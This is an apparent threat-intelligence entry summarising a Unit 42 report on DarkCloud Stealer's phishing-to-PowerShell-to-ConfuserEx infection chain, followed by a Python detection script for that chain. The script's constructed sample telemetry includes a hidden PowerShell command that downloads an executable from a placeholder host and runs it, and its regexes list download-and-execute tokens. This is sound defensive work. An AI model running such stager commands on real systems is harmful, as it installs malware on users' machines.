
New Infection Chain and ConfuserEx-Based Obfuscation for DarkCloud Stealer

NetmanageIT OpenCTI - opencti.netmanageit.com




SUMMARY :

Unit 42 researchers have observed changes in the distribution and obfuscation techniques of DarkCloud Stealer. The new infection chain, first seen in April 2025, uses ConfuserEx obfuscation and a final payload written in Visual Basic 6. The attack begins with a phishing email carrying an archive attachment; opening it leads to the download and execution of a PowerShell script. That script drops an executable protected by ConfuserEx, which in turn injects the DarkCloud Stealer payload into a legitimate process (process hollowing). The malware also employs anti-analysis techniques such as string encryption and obfuscation. These changes illustrate the evolving evasion strategies of cybercriminals and underscore the need for behaviour-based detection of the chain as a whole rather than reliance on static signatures for any single stage.
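The summary above argues for behaviour-based detection of the chain rather than signatures for one stage. The following is an added example (not Unit 42 or OpenCTI code, and not a published detection for this campaign) of what such a correlation looks like over endpoint telemetry. It uses constructed Sysmon-style records: process creation (Event ID 1) and process access (Event ID 10). Every PID, user name, URL and path in the sample data is invented, and the hollowing host is a stand-in name, not the process the report identifies. The three stages it links are the ones the summary describes: PowerShell with a download-and-run command line, an executable spawned from a user-writable directory, and that executable opening a system binary's process with the rights a hollowing loader needs.

```python
"""Correlate PowerShell stager -> dropped executable -> injection into a
system process, over constructed Sysmon-style events (added example)."""
import re

# Command-line tokens typical of PowerShell download-and-run stagers.
DOWNLOAD_CMD = re.compile(
    r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|net\.webclient|"
    r"invoke-expression|\biex\b|frombase64string|start-bitstransfer",
    re.I,
)
# Locations a phishing-delivered dropper is usually written to.
USER_WRITABLE = re.compile(
    r"^c:\\users\\[^\\]+\\(appdata|downloads|desktop|temp)\\", re.I
)
# Where a legitimate hollowing host normally lives.
SYSTEM_DIR = re.compile(r"^c:\\windows\\(system32|syswow64)\\", re.I)
# PROCESS_CREATE_THREAD | PROCESS_VM_WRITE | PROCESS_SUSPEND_RESUME: the
# minimum a hollowing loader needs on its target. PROCESS_ALL_ACCESS
# (0x1FFFFF) as logged by Sysmon includes all three bits.
INJECT_RIGHTS = 0x0002 | 0x0020 | 0x0800


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def find_chains(events):
    """Return one alert dict per stager -> dropper -> injection chain found."""
    procs = {e["pid"]: e for e in events if e["eid"] == 1}
    children = {}
    for e in procs.values():
        children.setdefault(e["ppid"], []).append(e)
    access = [e for e in events if e["eid"] == 10]

    alerts = []
    for ps in procs.values():  # stage 1: PowerShell stager
        if _basename(ps["image"]) not in ("powershell.exe", "pwsh.exe"):
            continue
        if not DOWNLOAD_CMD.search(ps["cmdline"]):
            continue
        for dropped in children.get(ps["pid"], []):  # stage 2: dropped exe
            if not USER_WRITABLE.match(dropped["image"]):
                continue
            for acc in access:  # stage 3: injection-capable handle
                if acc["source_pid"] != dropped["pid"]:
                    continue
                if acc["granted_access"] & INJECT_RIGHTS != INJECT_RIGHTS:
                    continue
                target = procs.get(acc["target_pid"])
                if target is None or not SYSTEM_DIR.match(target["image"]):
                    continue
                alerts.append({
                    "powershell_pid": ps["pid"],
                    "dropper_pid": dropped["pid"],
                    "dropper_image": dropped["image"],
                    "target_pid": target["pid"],
                    "target_image": target["image"],
                })
    return alerts


# Constructed telemetry: an archive tool launches PowerShell, which fetches
# and runs a file from AppData, which then opens a system process with
# full access. "legit_host.exe" is a placeholder, not the real target.
SAMPLE_EVENTS = [
    {"eid": 1, "pid": 4100, "ppid": 3000,
     "image": r"C:\Program Files\WinRAR\WinRAR.exe",
     "cmdline": r'"C:\Program Files\WinRAR\WinRAR.exe" invoice.rar'},
    {"eid": 1, "pid": 4120, "ppid": 4100,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -w hidden -c (New-Object Net.WebClient)"
                r".DownloadFile('http://example.invalid/u','C:\Users\alice"
                r"\AppData\Roaming\u.exe'); Start-Process u.exe"},
    {"eid": 1, "pid": 4130, "ppid": 4120,
     "image": r"C:\Users\alice\AppData\Roaming\u.exe", "cmdline": "u.exe"},
    {"eid": 1, "pid": 4140, "ppid": 4130,
     "image": r"C:\Windows\SysWOW64\legit_host.exe", "cmdline": "legit_host.exe"},
    {"eid": 10, "source_pid": 4130, "target_pid": 4140, "granted_access": 0x1FFFFF},
]

# Constructed benign activity: an admin downloads a tool, and a monitoring
# agent queries a system process with PROCESS_QUERY_LIMITED_INFORMATION.
BENIGN_EVENTS = [
    {"eid": 1, "pid": 5100, "ppid": 5000,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell Invoke-WebRequest https://example.invalid/t.zip"
                r" -OutFile C:\tools\t.zip"},
    {"eid": 1, "pid": 5200, "ppid": 800,
     "image": r"C:\Windows\System32\svchost.exe", "cmdline": "svchost.exe -k x"},
    {"eid": 1, "pid": 5300, "ppid": 800,
     "image": r"C:\Program Files\Vendor\agent.exe", "cmdline": "agent.exe"},
    {"eid": 10, "source_pid": 5300, "target_pid": 5200, "granted_access": 0x1000},
]

if __name__ == "__main__":
    for alert in find_chains(SAMPLE_EVENTS):
        print("chain:", alert)
    print("benign alerts:", find_chains(BENIGN_EVENTS))
```

The point of the example is the linkage, not any one rule: each stage on its own (PowerShell with a download cmdlet, an executable in AppData, a full-access handle to a system process) fires constantly in a real environment, whereas the three in parent-child sequence are rare. In production the parent-child lookup should key on Sysmon's ProcessGuid rather than PID (PIDs are reused), the stage-1 match should also cover script hosts such as wscript.exe and mshta.exe, and the access check can be tightened to targets that the dropper itself created, since hollowing starts by creating the host process suspended.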

OPENCTI LABELS :

process hollowing,infostealer,obfuscation,anti-analysis,infection chain,confuserex,darkcloud stealer,visual basic 6



